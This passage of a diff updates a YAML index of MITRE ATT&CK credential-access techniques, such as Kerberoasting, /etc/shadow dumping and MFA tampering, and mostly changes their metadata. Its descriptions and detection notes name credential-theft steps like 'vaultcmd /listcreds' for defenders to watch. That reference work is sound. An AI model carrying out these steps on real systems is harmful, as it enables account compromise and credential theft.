         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47134,6 +47879,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -47145,18 +47891,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -47175,14 +47921,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47211,24 +47954,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -47263,13 +48008,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47347,14 +48089,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -47370,6 +48111,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47378,13 +48120,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -47392,15 +48134,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -47411,9 +48149,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -47459,7 +48196,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47478,17 +48215,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47521,10 +48257,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47561,11 +48296,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47633,34 +48367,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47669,20 +48379,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
         <code>/etc/passwd</code> and <code>/etc/shadow</code>, alerting on the pid,
         process name, and arguments of such programs.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
+      created: '2020-02-11T18:46:56.263Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/008
+        external_id: T1003.008
+      - source_name: Linux Password and Shadow File Formats
+        description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
+          File Formats. Retrieved February 19, 2020.
+        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
+      - source_name: nixCraft - John the Ripper
+        description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
+          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
+          2020.'
+        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.008
     atomic_tests: []
   T1558.002:
@@ -47714,7 +48446,7 @@ credential-access:
           from Memory. Retrieved October 11, 2019.
         url: https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea
         source_name: Medium Detecting Attempts to Steal Passwords from Memory
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T21:46:46.831Z'
       name: 'Steal or Forge Kerberos Tickets: Silver Ticket'
       description: |-
         Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
@@ -47740,13 +48472,11 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.002
     atomic_tests: []
   T1555.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:44:35.906Z'
       name: 'Credentials from Password Stores: Windows Credential Manager'
       description: |-
         Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)
@@ -47763,24 +48493,24 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Bernaldo Penas Antelo
+      - Mugdha Peter Bansode
+      - Uriel Kosayev
+      - Vadim Khrykov
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)
 
         Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
 
         Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Bernaldo Penas Antelo
-      - Mugdha Peter Bansode
-      - Uriel Kosayev
-      - Vadim Khrykov
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -47821,36 +48551,13 @@ credential-access:
         url: https://www.passcape.com/windows_password_recovery_vault_explorer
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555.004
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -47871,6 +48578,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -47885,52 +48593,42 @@ credential-access:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -47952,6 +48650,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -47962,23 +48661,50 @@ credential-access:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1111:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:37:20.612Z'
       name: Multi-Factor Authentication Interception
       description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
         (i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -48049,9 +48775,8 @@ credential-access:
         url: https://sec.okta.com/scatterswine
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.003:
     technique:
@@ -48110,12 +48835,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.003
     atomic_tests: []
   T1558.003:
     technique:
-      modified: '2023-03-30T21:01:46.538Z'
+      modified: '2024-09-23T22:20:10.994Z'
       name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
       description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
         (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -48147,6 +48871,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48156,7 +48881,6 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -48168,111 +48892,49 @@ credential-access:
       id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
       created: '2020-02-11T18:43:38.588Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1558/003
         external_id: T1558.003
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
       - source_name: Empire InvokeKerberoast Oct 2016
         description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
           March 22, 2018.
         url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
           Domain. Retrieved March 22, 2018.
         url: https://adsecurity.org/?p=2293
-      - source_name: Microsoft Detecting Kerberoasting Feb 2018
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Microsoft SPN
-        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
-          2018.
-        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Microsoft SetSPN
         description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
           Syntax (Setspn.exe). Retrieved March 22, 2018.
         url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
-      - source_name: SANS Attacking Kerberos Nov 2014
-        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        url: https://redsiege.com/kerberoast-slides
+      - source_name: Microsoft SPN
+        description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+          2018.
+        url: https://msdn.microsoft.com/library/ms677949.aspx
       - source_name: Harmj0y Kerberoast Nov 2016
         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
